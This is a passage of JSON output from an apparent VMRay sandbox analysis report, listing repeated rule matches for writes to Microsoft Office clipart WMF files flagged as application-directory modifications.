"gfn_34594", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105250.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34601", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34608", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34617", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34626", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105282.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34633", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105282.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105286.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34640", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105286.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105288.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34647", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105288.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105292.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34654", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105292.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34661", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105298.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34668", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105298.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34675", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34682", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34689", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105332.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34696", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105332.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105336.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34703", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105336.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105338.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34710", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105338.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105348.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34717", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105348.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105360.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34726", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105360.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105368.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34733", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105368.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105376.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34740", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105376.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105378.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34747", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105378.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105380.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34754", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105380.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105384.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34761", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105384.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105386.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34768", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105386.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105388.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34775", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105388.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105390.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34782", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105390.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105396.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34789", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105396.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34796", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34803", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34812", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105414.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34819", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105414.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105490.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34826", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105490.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105496.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft 